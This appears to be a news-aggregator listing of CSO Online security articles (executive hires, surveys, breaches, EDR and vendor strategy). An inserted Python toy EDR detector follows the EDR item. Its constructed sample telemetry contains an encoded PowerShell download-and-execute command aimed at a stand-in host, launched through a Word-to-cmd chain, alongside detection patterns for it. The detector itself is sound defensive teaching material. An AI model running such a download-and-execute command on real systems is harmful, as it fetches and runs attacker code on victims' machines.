What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
CSO.webp 2018-11-13 09:46:00 Get 90% Off Your First Year of RemotePC, Up To 50 Computers for $6.95 (direct link) iDrive has activated a significant discount on its remote access software RemotePC in the days leading into Black Friday. RemotePC by iDrive is a full-featured remote access solution that lets you connect to your work, home or office computer securely from anywhere, and from any iOS or Android device. Right now, the 50-computer package is 90% off, or just $6.95 for your first year. If you've been thinking about remote access solutions, now is a good time to consider RemotePC. Learn more about it here. Guideline
CSO.webp 2018-11-12 09:04:00 Cylance researchers discover powerful new nation-state APT (direct link) When a Belgian locksmith attacked the Pakistani Air Force, researchers at Cylance sat up and took notice. The locksmith probably never knew his website had been taken over by a nation-state hacking group as a command-and-control server, nor that exploit-laden Microsoft Word documents crafted to spear-phish Pakistani Air Force officers were hosted there for more than six months. The Belgian locksmith was just a pawn in a global game of cyberespionage fought by a new nation-state hacking group, and while the target in this operation was Pakistan, both nuclear-armed and a haven for terrorists in the region, the incredibly sophisticated layers of misdirection the malware uses to mislead and delay forensic analysis worry security researchers, who say these attack tools could be deployed against anyone else in the world at any time. Guideline
CSO.webp 2018-11-05 08:42:00 (Déjà vu) Republican Kemp accuses Georgia Democrats of hacking but provides no proof (direct link) Tossing around accusations of a failed attempt to hack a state's voter registration system, without actually providing any proof, is one way to really stir things up right before the midterm elections. That is what Brian Kemp, Georgia's current secretary of state, who is also the Republican candidate for governor, did on Sunday. With the midterm elections just a few days away, Kemp accused the Democratic Party of Georgia of hacking the state's voter registration system. Democrat Stacey Abrams, his opponent, called it “a reckless and unethical ploy” to mislead voters. Hack Guideline
CSO.webp 2018-11-04 09:19:00 (Déjà vu) Meaner, more violent Stuxnet variant reportedly hits Iran (direct link) Stuxnet allegedly has a vicious little brother, or perhaps a malicious cousin: the complex malware was described as similar to Stuxnet but “more violent, more advanced and more sophisticated.” Iran, according to the Times of Israel, admitted that its “infrastructure and strategic networks” were hit by a meaner, leaner version of Stuxnet. A TV news report added that the Iranians are “not admitting, of course, how much damage has been caused.” The report came after Iranian Supreme Leader Ayatollah Ali Khamenei said Iran needed to step up efforts to fight enemy “infiltration.” Reuters also reported that Gholamreza Jalali, the head of Iran's civil defense agency, said, “Recently we discovered a new generation of Stuxnet which consisted of several parts ... and was trying to enter our systems.” Jalali didn't go into more detail. Malware Guideline
CSO.webp 2018-10-22 14:04:00 BrandPost: The Answer to Cyber Threats: People or Technology? (direct link) A new global survey by Ponemon and ServiceNow of nearly 3,000 cybersecurity professionals reveals that more than half of the companies surveyed have experienced a breach in the past year. Compounding this issue: the volume of cyberattacks continues to increase, and the industry is facing a shortage of qualified security pros. But experts agree that hiring more people isn't necessarily the answer to this cyber threat puzzle. In this session Bob Bragdon, Senior Vice President and Publisher of CSO, and Myke Lyons, Security Transformational Leader at ServiceNow, explore the answers. Threat Guideline
CSO.webp 2018-10-19 11:22:00 (Déjà vu) Trend Micro shines a light on its new cybersecurity solutions (direct link) Last week, Trend Micro came to Boston for its annual Trend Insights industry analyst event. The company provided an overview of its business, products, and strategy. Here are a few of my take-aways:

Trend Micro is prepared for the next chapter in endpoint security. To maintain its market leadership, Trend Micro is rolling out Apex One, its newest endpoint security product. Apex One provides more prevention/detection capabilities while consolidating all endpoint security functions onto a single agent. Trend Micro has also decided to swim against the industry tide by including EDR as part of its core commercial endpoint security product (note: EDR requires a licensing change), so all customers who upgrade will get Trend Micro EDR, alleviating the need to shop elsewhere. Apex One will be an easy decision for existing Trend Micro customers and may be an attractive alternative for CISOs looking for an endpoint security solution with all the bells and whistles.

Trend Micro product strategy: better together. Trend Micro talks about connected threat defense, which brings several of its individual endpoint, network, and cloud products together as an integrated cybersecurity technology architecture. Good timing, as ESG research indicates that 62% of organizations would be willing to buy a majority of their cybersecurity products from a single enterprise-class vendor. For example, TippingPoint IDS/IPS is tightly integrated with Deep Discovery, Trend Micro's malware detection sandbox, while Deep Security, Trend Micro's cloud workload security offering, integrates with both of these products. As part of its business strategy, Trend Micro is working with customers to replace discrete point tools with Trend Micro products and reap integration benefits such as improved threat prevention/detection while streamlining security operations.

Moving toward managed services. While Trend Micro engineered its EDR offering for ease of use, it recognizes that many organizations don't have the resources or skills to deploy, learn, or operate detection/response tools on their own. To work with these customers, Trend Micro is rolling out a managed detection and response (MDR) service as a complement to its products. Furthermore, Trend Micro is spinning out a new company called Cysiv, which offers several other advanced managed security services. With these moves, Trend Micro is demonstrating that it wants to play a direct role in the growing market for security services, rather than an indirect role as an arms dealer alone.

All in on cloud security. Trend Micro jumped on the server virtualization and cloud computing bandwagons early by forming tight partnerships with VMware, Amazon, and Microsoft. Now that every other established vendor and VC-backed startup is all in on the cloud, Trend Micro is moving beyond basic cloud security support. For example, Trend Micro cloud security products are tightly coupled with its connected threat defense for prevention/detection. From a cloud perspective, Trend Micro has gotten very familiar with application developers and DevOps to make sure that its cloud security products fit seamlessly into a CI/CD pipeline. Trend Micro has also expanded its purview to cover containers, microservices, and even cloud-based application security. In this way, Trend Micro is aligning with cloud innovation and culture, not just hawking security products.

More business investment. Over the past five years, Trend Micro's business has gone through some significant shifts. For example, a larger percentage of the company's revenue comes from commercial sales rather than consumer sales, while Trend Micro has seen rapid market growth in North America. Trend Micro will hire engineers, expand sales staff, and service channel partners to keep this momentum going. Malware Threat Guideline
CSO.webp 2018-09-19 07:00:00 BrandPost: Cybercriminals Shift Tactics to Keep a Low Profile (direct link) Over the past several years, cyberattacks have become more targeted and sophisticated. Cybercriminals have begun to augment their attacks with advanced technologies, such as machine learning and automation, to increase the speed and efficiency of attacks and to expand the number of potential victims by identifying and targeting multiple vulnerabilities. They have also expanded pay-as-you-go “as a service” attack models to make it easier to proliferate attacks. Cybercriminals have also demonstrated increased prowess at highly disruptive public attacks, taking large numbers of organizations, and even segments of the Internet, offline on a regular basis. However, while tactics such as DDoS and ransomware can have a major impact on a network, their disruptive nature typically leads to fairly quick remediation efforts. Ransomware Guideline
CSO.webp 2018-09-06 02:30:00 EDR is dead! Long live XDR! (direct link) Endpoint detection and response (EDR) has been an important technology for security professionals as they attempt to find suspicious activity, or at least traces of it, on endpoints and hosts. Cybersecurity itself is as old as computers, but the EDR segment is still in its infancy, with the first solutions dating back only about five years or so. The technology works by monitoring the endpoint and then storing the data in a centralized repository where analysis can be done to detect a threat. Typically, EDR solutions require a software agent to be installed on the host system to provide the data used in monitoring and reporting. EDR has been critical for advanced protection, as more threats are being directed at the user. In fact, one of the industry's leading penetration testers recently told me that he can normally breach an organization within an hour by attacking the user and compromising the endpoint. Also, Windows is still the most widely used operating system in the business world, and many of its internal features are used by threat actors to breach that computer and others. Threat Guideline
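The pipeline the EDR article sketches, an agent on each host emitting events, a central repository pooling them, and analysis over the pooled data surfacing threats, in miniature. This is an added example, not code from the CSO article or from any EDR vendor: a detection pass over constructed Windows process-creation telemetry from two hypothetical hosts. The hostnames, paths, command lines and rule names are all constructed for the example; the two rules (an Office application in the ancestry of a script host, and a Base64-encoded PowerShell command line) illustrate the kind of built-in Windows features the article says threat actors abuse, and are not rules taken from any product.

```python
"""Toy EDR analysis over centrally collected process telemetry.

Added example, not code from the article or from any EDR vendor. The hosts,
paths and command lines are constructed sample data.
"""
import base64
import re
from dataclasses import dataclass

# Process names used by the two illustrative rules (assumed lists, not a
# product's rule set).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record as an endpoint agent would report it."""
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Alert:
    host: str
    pid: int
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(event, by_key, max_depth=4):
    """Walk parent pointers on the same host. PIDs are host-local, so the
    index key is (host, pid). Real agents add a process GUID because PIDs
    are reused; this toy relies on the sample data not reusing them."""
    chain, cur = [], event
    for _ in range(max_depth):
        parent = by_key.get((cur.host, cur.ppid))
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.
    PowerShell encodes the script as UTF-16LE before Base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Central analysis: index all events from all hosts, then apply rules."""
    by_key = {(e.host, e.pid): e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        if name in SCRIPT_HOSTS:
            office = next((a for a in lineage(e, by_key)
                           if basename(a.image) in OFFICE_APPS), None)
            if office is not None:
                alerts.append(Alert(e.host, e.pid, "office_spawns_script_host",
                                    f"{basename(office.image)} (pid {office.pid}) -> {name}"))
        if name in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(e.cmdline)
            if decoded is not None:
                sev = "high" if re.search(r"IEX|Invoke-Expression|DownloadString|FromBase64String",
                                          decoded, re.I) else "medium"
                alerts.append(Alert(e.host, e.pid, "encoded_powershell", f"{sev}: {decoded[:80]}"))
    return alerts


# Constructed sample telemetry: ws-01 is benign, ws-02 shows a macro-style
# chain (Word -> cmd -> encoded PowerShell downloader). The payload is encoded
# here so the sample Base64 is known to be valid.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
EVENTS = [
    ProcEvent("ws-01", 1200, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws-01", 1300, 1200, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE /n report.docx"),
    ProcEvent("ws-02", 2200, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws-02", 2300, 2200, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE /n invoice.docx"),
    ProcEvent("ws-02", 2400, 2300, r"C:\Windows\System32\cmd.exe", f"cmd.exe /c powershell -nop -w hidden -enc {ENC}"),
    ProcEvent("ws-02", 2500, 2400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell -nop -w hidden -enc {ENC}"),
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a.host} pid={a.pid} {a.rule}: {a.detail}")
```

Running it flags the cmd.exe and powershell.exe processes on ws-02 (Word in their ancestry) and decodes the PowerShell payload; ws-01, where Word simply opened a document, produces nothing. The point the article makes about centralized analysis shows up in the lineage walk: the parent/child relationship is only visible once every event from the host sits in one index, which is also why real agents key processes on a GUID rather than a reusable PID.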
CSO.webp 2017-05-01 12:41:00 Finance and government veteran Mark Morrison joins OCC as chief security officer (direct link) The equity derivatives clearing organization OCC has hired Mark Morrison as senior vice president and chief security officer. In this new position, Morrison will report to OCC's executive vice president and chief risk officer, John Fennell. "To deliver world-class risk management, clearance and settlement services, we must ensure the confidentiality, availability, and integrity of our systems on behalf of market participants in our role as a Systemically Important Financial Market Utility," said Craig Donohue, OCC executive chairman and chief executive officer, in a press release. "With over 35 years of experience in the field of information and cyber security, Mark brings a high level of expertise to our risk management team. His leadership will help OCC continue to integrate information security best practices into our service offerings, reduce systemic risks, and safeguard the integrity of the markets we clear." Guideline
CSO.webp 2017-04-28 09:37:00 Cyber Resilience 2.0, now shipping (direct link) The latest 'version' of cyber resilience includes "testing," according to a new report published by Cybersecurity Ventures. (Disclaimer: Steve Morgan is the CEO and founder of Cybersecurity Ventures.) At a recent cyber resilience 'Think Tank' held in San Francisco during RSA Conference 2017, heads of IT security, CISOs, cybersecurity industry experts, and vendor executives gathered to come up with a new definition of an old term. The report states that cyber resilience is an organization's capacity to adapt to adverse cyber events, whether external or internal, malicious or unintentional, in ways that maintain the confidentiality, integrity, and availability of whatever data and services are important to the organization. Guideline
CSO.webp 2017-04-28 06:05:00 (Déjà vu) University of Utah hires Randall Arvay as CISO (direct link) On May 22, Randall (Randy) J. Arvay will become the University of Utah's new chief information security officer (CISO). Arvay is currently CISO at Mississippi Medical Center. Arvay is a Certified Information Systems Security Professional and Project Management Professional and holds a top-secret Department of Defense clearance. Earlier, Arvay was chief of cybersecurity and quality assurance at the Joint Spectrum Center of the Defense Information Systems Agency (DISA), where he was accountable for all cyber operations, in all technical and non-technical aspects of cyberspace, and for overall information assurance, risk management and regulatory compliance. Guideline
CSO.webp 2017-04-21 04:00:00 Serenova hires Stuart Clark as its first CISO (direct link) Serenova, a contact-center-as-a-service provider, has named Stuart Clark as its first chief information security officer (CISO). A key goal for Clark in his new role will be to standardize and scale security best practices to support the company's growth. He will oversee Serenova's IT and security organization and be responsible for driving IT strategy and innovation to scale the company's information and security system capabilities. "We are seeing a new wave of cloud adoption as on-premises solutions continue to fall away, and security is now top of mind, particularly in areas like financial services and healthcare where contact centers are growing," said Vasili Triant, CEO of Serenova, in a press release. "Creating the role of CISO and bringing on someone of Stuart's caliber demonstrates our unwavering commitment to protecting our customers' information assets as they make this move to cloud, as well as the assets of our entire company. Stuart's expertise, track record and breadth of experience across the information technology landscape mean he is the right leader to join our world-class executive team." Guideline
CSO.webp 2017-04-21 03:30:00 IDG Contributor Network: Night at the information security museum (direct link) Earlier this week, Ira Winkler wrote "What security practitioners can learn from United's failures." He astutely noted that organizations should learn from failure, and ideally from the failure of others. I'll take his lead and provide another learning opportunity for information security professionals. Physical security is a fundamental part of information security. In fact, operating systems base much of their security controls on an assumed secure physical infrastructure. Museums are a great example of where effective physical security comes into play. Like information security teams, museum security is often understaffed with limited budgets. Guideline
CSO.webp 2016-10-10 04:48:00 Terror suspect's locked iPhone could lead to a second Apple-FBI showdown (direct link) The FBI could be gearing up for another battle with Apple. In the wake of a mass stabbing at a Minnesota mall that was linked to the terrorist group ISIS, the FBI is looking for answers on a passcode-protected iPhone. “Dahir Adan's iPhone is locked,” FBI special agent Rich Thornton told reporters at a press conference, according to Wired. “We are in the process of assessing our legal and technical options to gain access to this device and the data it may contain.” Guideline
CSO.webp 2016-10-06 13:20:00 IDG Contributor Network: Time to kill security awareness training (direct link) October is National Cyber Security Awareness Month. I am hoping you will join me in a national program to kill cybersecurity awareness training programs. I don't know who came up with the concept of “security awareness training,” but it has reached the end of its utility and should be replaced with something else. Is all we want for users to be “aware” of security issues? Don't we want them to be educated enough to be active parts of the solution? I looked into the history of “security awareness training.” Did we inherit it from the pioneers? Guideline
CSO.webp 2016-10-06 12:27:00 Why cybersecurity spending will drive business digitization (direct link) The days of CEOs regarding data protection technologies and staff as a budget drain and operating tax that stifles innovation are over. Galvanized by high-profile breaches, companies are shelling out more money to shore up corporate defenses. CEOs also recognize that security is table stakes for building digital products and are entrusting their CISOs with more responsibilities. Fifty-nine percent of the 10,000 C-suite executives polled by PwC for the new Global State of Information Security Survey said they are investing more in cybersecurity, including data analytics, real-time monitoring, authentication tools that include biometrics, and managed security services (MSS). David Burg, PwC's U.S. and global leader of cybersecurity and privacy, says anecdotal evidence also suggests that companies are turning to CISOs to build security into software, including anything from mobile applications to connected cars that exchange information with smartphones. Guideline
CSO.webp 2016-10-06 03:27:00 Business transformation proves to be a catalyst for cybersecurity spending (direct link) As enterprises accelerate their use of cloud computing and online services and ready themselves for internet of things deployments, they are straining to find the cybersecurity talent and security tools needed to secure these efforts. That's one of the most important takeaways from the Global State of Information Security Survey (GSISS) 2017, a worldwide study conducted by PwC, CIO and CSO and released today. According to the GSISS survey, 59 percent of respondents say they are boosting their security spending as a result of their increased use of digital technologies and their retooling of business models to provide customers, employees, and partners with ever more digital services and apps. These security efforts include increased investments in cloud computing environments and data monitoring, as well as managed security services. The survey was conducted online from April 4, 2016 to June 3, 2016. Guideline
CSO.webp 2016-10-05 10:07:00 Crisis planning: 6 ways to put people first (direct link) If your business is located in the southeastern U.S., you're probably bracing for Hurricane Matthew, which as of this writing is headed for Florida after making landfall in Cuba. All too familiar with the havoc a hurricane can wreak, you likely have a battle-tested plan for dealing with such storms and their aftermath. Guideline
CSO.webp 2016-10-04 11:04:00 War stories: the vulnerability scanning argument (direct link) Over the last couple of decades I have had all sorts of different jobs. I have to count myself as rather fortunate for the experiences I have had along the way. They went a long way toward teaching me some valuable lessons. Also, in some cases, they taught me how to hold my tongue. In one such job years ago, I was working on implementing a company-wide vulnerability scanning platform. As you might imagine, especially if you have done this sort of project before, there were some land mines I had to contend with in due course. At this particular job there were all sorts of different business units who acted as individual fiefdoms and had little interest in having their systems scanned by anyone. “We have a firewall, we're fine,” one team lead had grouched at me. “We have detection capabilities and we'll know if you scan our systems.” Guideline
CSO.webp 2016-10-04 10:41:00 4 questions for Virtual Health's Dan Bart (direct link) Dan Bart has joined cloud-based health care technology startup Virtual Health in the newly created role of executive vice president of information security and implementation, reporting to CEO Adam Sabloff. This role is Bart's first foray into the private sector, and he will be responsible for leading all of Virtual Health's information security efforts, overseeing cybersecurity policies and procedures, and optimizing the implementation of the company's solutions to best support client needs and protect sensitive client data. Prior to joining Virtual Health, Bart served more than 13 years at the Defense Information Systems Agency, where he was responsible for the implementation and operation of information systems designed to defend the DoD information network and protect classified data of critical value to national security. He held numerous management positions at DISA overseeing and optimizing cyber situational awareness systems, field communications, NetOps, secure configuration management systems and other critical infrastructure for the agency. Guideline
CSO.webp 2016-10-03 18:37:00 Hutton Hotel removes unwanted malware guest (direct link) The long, sordid list of companies that have had their payment systems compromised has added a new victim to its ranks. This past Friday the upscale Hutton Hotel, a stone's throw from Vanderbilt University in Nashville, disclosed that the payment processing systems in its hotel had been compromised by ne'er-do-wells. I think we have arrived at the point where companies with payment systems that have not been reviewed should assume they're compromised until proven otherwise. A dour assessment of things. But when you consider that companies like Hard Rock, Target and even Trump Hotels (twice) suffered similar compromises, it really leads one to conclude that this is an activity required of any information security team. If you are responsible for a payment Guideline
CSO.webp 2016-09-30 09:07:00 IDG Contributor Network: Treasures attackers look for in the sea of email (direct link) As we dive into October, Cybersecurity Awareness Month, there are lots of strategies to help us all become stronger swimmers in the digital waters. Given that there are 112 billion business emails sent around the world every day, that is one huge ocean that everyone can learn how to better navigate. Since its inception, email has become mission critical, and many necessities beyond mail service have grown up along with it. Enterprises have become burdened by the complexities of email, which additionally requires the added protections of encryption gateways, spam filters, phishing protections, and much more. In order to attack all of the issues of email security in the age of digital disruption, you first have to know what is beneath the rough seas. Guideline APT 32
CSO.webp 2016-09-29 15:00:00 (Déjà vu) BrandPost: Automating the Threat Defense Lifecycle: What the Heck Does THAT Mean? (direct link) When we introduced our strategy at FOCUS '15, at its core was a simple concept: create integrated security systems to automate the threat defense lifecycle so you can address more threats, faster, with fewer resources. With the recent announcement of our strategic partnership with TPG, we want to further define our strategy and show how we are uniquely leading the market, making IT security as dynamic and responsive as today's most dangerous threats.[1] Guideline
CSO.webp 2016-09-29 10:36:00 IDG Contributor Network: Anatomy of an insider attack (direct link) Insider threats are often addressed in blogs, articles, and books. But it isn't always easy to tell the story to business leaders and their employees. An episode of one of my favorite shows included a character taking steps any employee could complete in an unprepared organization. Let's run through the plot (a good scenario for management) and then take a look at what would have prevented each step in the attack. The attack: Chris was tasked by an external attacker, one who had leverage over her, to steal legal documents related to a civil action. The attacker, we'll call him Bill, provided Chris with a USB drive loaded with malware. The malware was designed to extract login information from a target system. Guideline
CSO.webp 2016-09-28 05:47:00 Former Microsoft CISO joins bio-electronics company board of directors (direct link) Charles McNerney, general manager of retail technology at Microsoft and former CISO of its online services division, has been appointed to the board of directors of Nativis, Inc., a Seattle-based clinical-stage bio-electronics company. Founded in 2002, Nativis has invented and patented a technology that uses precisely targeted, ultra-low radio frequency energy (ulRFE) to regulate metabolic pathways at the molecular and genetic levels, without chemicals, radiation or drugs, delivered via a simple-to-use non-invasive device called Nativis Voyager®. Nativis' initial focus is on the treatment of patients with brain cancer, and in the spring of 2015 Nativis partnered with the Swedish Neuroscience Institute on a clinical trial to investigate the safety and efficacy of the Nativis Voyager RFE medical device in humans with recurrent glioblastoma multiforme, an aggressive brain tumor with a high rate of recurrence and a mortality rate of nearly 100 percent. Guideline
CSO.webp 2016-09-28 03:16:00 HackerOne CEO: 'We're building the world's biggest security talent agency' (direct link) Marten Mickos, a veteran executive with companies from MySQL to Sun, Nokia and HP, was not particularly excited about his meeting to explore a leadership role with HackerOne, a fledgling security company. Security is hard, it's unpleasant, it doesn't work very well. But he perked up fast after learning about HackerOne's crowdsourced model of finding and fixing security flaws, a model in which HackerOne plays a key matchmaking role between companies and ethical hackers in a rapidly growing marketplace of skills and needs. Those are still conducted through your platform, those private bounty programs? With increasing organization in the world, increasing internet access, good STEM education in many countries in the world, there is no practical limit to how many hackers we can find. We get them from India, Pakistan, Bangladesh, Russia, all the Russian-speaking countries, Western Europe, the U.S.A., Chile, Argentina. It's fantastic to see them because you suddenly realize that there are all these mostly young people who have a burning desire to make the world safer and, of course, make some money at the same time. They have such great intent and instincts about this. I don't think we'll run out of hackers ever. Just like in open source software, we have never run out of contributors. Guideline
CSO.webp 2016-09-27 06:13:00 IDG Contributor Network: Cybersecurity: is it really a question of when, not if? (direct link) Last week I had the pleasure of speaking at the Financial Times Cybersecurity Summit in London about the origins of global cybercrime and the current challenges of the cybersecurity industry. The week before, I attended the Gartner Security & Risk Management Summit, where Gartner's security experts and industry analysts presented a lot of exciting talks and reports about the current state of cybersecurity in the world. According to Gartner's Top 10 Security Predictions 2016, through 2020, 99 percent of vulnerabilities exploited will continue to be ones known by security and IT professionals for at least one year. Meanwhile, many companies and organizations spend huge amounts fighting mysterious APTs and zero-days. To better understand the subject, let's walk through some quick numbers and statistics about cybersecurity and cybercrime first. Guideline
CSO.webp 2016-09-27 04:24:00 After Tesla: why cybersecurity is central to the car industry's future (direct link) The news that a Tesla car was hacked from 12 miles away tells us that the explosive growth in automotive connectivity may be rapidly outpacing automotive security. This story is illustrative of two persistent problems afflicting many connected industries: the continuing proliferation of vulnerabilities in new software, and the misguided view that cybersecurity is separate from concept, design, engineering and production. This leads to a 'fire brigade approach' to cybersecurity where security is not baked in at the design stage for either hardware or software but added in after vulnerabilities are discovered by cybersecurity specialists once the product is already on the market. Guideline Tesla
CSO.webp 2016-09-22 09:36:00 IDG Contributor Network: Security's new training center, a first of its kind (direct link) Baltimore announced some exciting news yesterday. Electronic Technology Associates (ETA) and Cyberbit have partnered together in a new adventure, launching the first stand-alone hands-on cybersecurity training center in the U.S. Guideline
CSO.webp 2016-09-22 04:00:00 Over 6,000 vulnerabilities went unassigned by MITRE's CVE project in 2015 (direct link) In 1999, MITRE created the Common Vulnerabilities and Exposures (CVE) database as a way to standardize the naming of disclosed vulnerabilities. Seventeen years later, the CVE system is faced with bottlenecks and coverage gaps, as thousands of vulnerabilities go without CVE-ID assignments. These gaps are leaving business leaders and security teams exposed to vulnerabilities that their security products, which rely on CVE-IDs to function and assess risk, in some cases don't even know exist. Before CVE existed, the public had access to IBM X-Force (1997) and SecurityFocus' BID database, which was established around six months before CVE. Each had its own methods of tracking and disclosing vulnerabilities, and this led to a situation where there wasn't an easy way to determine if the different databases tracking such problems were referring to the same thing. MITRE Corporation, seeing an opportunity, created CVE to fix these issues. Guideline
CSO.webp 2016-09-21 03:22:00 Security challenge: Wearing multiple hats in IT (direct link) Are you taking on multiple job responsibilities at your company, including some aspects of information security? If so, you're not alone. At many organizations, IT professionals are being asked to handle a variety of security tasks and functions. For them, wearing multiple hats can create both opportunities and stress. Guideline
CSO.webp 2016-09-20 05:34:00 This hospital is moving to Amazon's cloud to protect its network (direct link) Since 2012, three Texas-based health care organizations have merged to create USMD Health System. During the past four years CIO Mike Yerrid has been on a mission to centralize and consolidate IT operations. And a big part of that is moving to Amazon's cloud. Yes, as a health care organization, USMD is subject to stringent regulations for protecting patient information, and yes, it's moving to the public cloud. USMD isn't alone. "Health care organizations are becoming more comfortable with cloud technology," says Lynne Dunbrack, leader of research firm IDC's Health Insights practice. Guideline
CSO.webp 2016-09-19 11:50:00 BrandPost: Automating the Threat Defense Lifecycle. What the Heck Does THAT Mean? (direct link) When we introduced our strategy at FOCUS '15, at its core was a simple concept: create integrated security systems to automate the threat defense lifecycle so you can address more threats, faster, with fewer resources. With the recent announcement of our strategic partnership with TPG we want to further define our strategy and show how we are uniquely leading the market, making IT security as dynamic and responsive as today's most dangerous threats. Guideline
CSO.webp 2016-09-16 08:38:00 Security leaders need to stop chasing "risk catnip" (direct link) How often do you indulge in "risk catnip"? Here's an example: "The hardest problem in computer science is fighting the urge to solve a different, more interesting problem than the one at hand." (Nick Lockwood, @nicklockwood, August 18, 2016.) That tweet earned over 3000 retweets and over 4000 likes. The chain of comments expresses understanding and offers more examples. The concept is similar to the effect of catnip on felines. Some just can't resist. In security, I dubbed this "risk catnip." Guideline
CSO.webp 2016-09-16 05:00:00 The CSO password management survival guide (direct link) By now we're all well aware of what makes a bad password: it's us. A glance at SplashData's annual reporting on the world's worst passwords shows just how laughably bad at creating passwords we humans really are. But what's worse, as Steve Ragan's analysis of leaked passwords shows, is that many passwords on the naughty list adhere to the carefully crafted password policies in use in companies today. How can security leaders do better? For one thing, we can stop blaming users, says Michael Santarcangelo. Instead, we can focus on providing them with technology that makes the job easier. That's where this guide comes in. Guideline
CSO.webp 2016-09-15 07:18:00 McCain opposes splitting NSA and Cyber Command (direct link) The head of the Senate Armed Services Committee is threatening to block any nominee to head up the National Security Agency if the Obama administration follows through on a plan to decouple the spy agency from U.S. Cyber Command, the digital warfare unit established in 2009. At a hearing on cybersecurity and encryption this week, Sen. John McCain (R-Ariz.) argued for preserving the current "dual hat" operating structure with the spy agency and the cyber warfare organization co-located and under common leadership. Guideline
CSO.webp 2016-09-14 12:50:00 Government, carmakers more worried than ever about vehicle cyber attacks (direct link) Automakers and legislators appear to be coming together on the need for greater cybersecurity for vehicles that are increasingly connected to the internet and controlled by ever-more sophisticated computer systems and software. Volkswagen today announced it will form a cybersecurity company headed by Yuval Diskin, the former head of Israel's security agency. The company, CyMotive Technologies, will be 40% owned by the German automaker and the rest will be controlled by Diskin and two other former leaders in Israel's Shin Bet intelligence agency. Guideline
CSO.webp 2016-09-14 02:58:00 9 biases killing your security program (direct link) I see what I want to see. We're not always as rational in our decision-making as we'd like to think we are. This is often true in our daily decisions, from what you'd like to eat for lunch to the bigger decisions we make, such as what kind of car to buy or where we choose to live. These cognitive biases, or deviations from rational judgement, can affect every aspect of our decision-making. It'd be foolish to think such irrational thinking doesn't lead to a distorted view of cybersecurity risks, or inaccurate judgements in defending enterprise systems. Here's a (by no means all-inclusive) list of nine such cognitive biases that security professionals should especially remain aware of. Guideline
CSO.webp 2016-09-13 08:21:00 IDG Contributor Network: Cyberwar is here! Offense, defense and 'special teams' (direct link) If anyone is asleep at the switch and thinks cyber is just a fad or trend, then consider this: Ginni Rometty, chairman, president and CEO of IBM, recently said, "We believe that data is the phenomenon of our time. It is the world's new natural resource. It is the new basis of competitive advantage, and it is transforming every profession and industry. If all of this is true, even inevitable, then cybercrime, by definition, is the greatest threat to every profession, every industry, every company in the world." Do I have your attention now? Analogies to NFL teams (offense, defense and special teams), as well as to military special forces, can be applied to organizing elite talent around a specific objective: the corporate cyber challenge each company faces. Guideline
CSO.webp 2016-09-12 09:52:00 CISO Desk Reference Guide (direct link) Are you an aspiring, recently hired or promoted CISO looking for the definitive how-to guide for your position? Look no further. An experienced CISO along with two security subject matter experts have authored a comprehensive modern-day text, 'CISO Desk Reference Guide: A practical guide for CISOs', which covers risk management, compliance, audit, IT security disciplines, cybersecurity extending to IoT (internet of things) devices, cyber insurance, staffing, board concerns, and everything in between. The three authors, Bill Bonney, Gary Hayslip, and Matt Stamper, state their decision to write the book came from the shared realization that the dramatic escalation in cyber threats was not going to peak any time soon. A recent report from Cybersecurity Ventures aligns with their thinking and predicts cybercrime damages will cost the world $6 trillion annually by 2021, up from $3 trillion last year. Guideline
CSO.webp 2016-09-08 10:27:00 IDG Contributor Network: Woe is IT, the pain of risk management (direct link) As I've spoken with leaders in the security industry over the course of developing this blog, I've learned a lot about the modern CISO. More often, enterprises are looking to hire leaders who not only have a background in IT but also have the required business acumen to understand risk. Risk assessment and risk management are key elements in a successful security strategy because the threat landscape continues to expand with the explosion of IoT. Devices are everywhere, and everyone is connecting to the network, causing headaches for security management professionals. LogMeIn recently polled 500 IT professionals on the array of challenges ongoing in their security threat landscape. Not surprisingly, cloud security, devices, and user behavior are some of the most often reported pain points for IT professionals. Guideline
CSO.webp 2016-09-08 03:00:00 Build security into software development (direct link) Devops is transforming how developers and operations teams work together to deliver better software faster. At its core, devops is about automation. When several tasks in development, testing, and deployment are automated, developers can make changes to code and deploy to production frequently. Amazon, a leading devops proponent, at one point claimed to have more than 1,000 deployments a day. Guideline
CSO.webp 2016-09-07 09:01:00 Half of network management systems vulnerable to injection attacks (direct link) Cross-site scripting and SQL injection attacks are well-known threats for public-facing Web applications, but internal systems can be attacked as well. For example, about half of the network management systems studied had these vulnerabilities, according to a report released today. It all comes down to input validation, or lack of it, said Deral Heiland, research lead at Boston-based Rapid7, Inc. and one of the authors of the report. Network management systems are in regular communication with the devices on a company's network. But, because the communications are machine-to-machine, people sometimes forget that the inputs still need to be checked to make sure there's nothing weird or malicious in there. Guideline
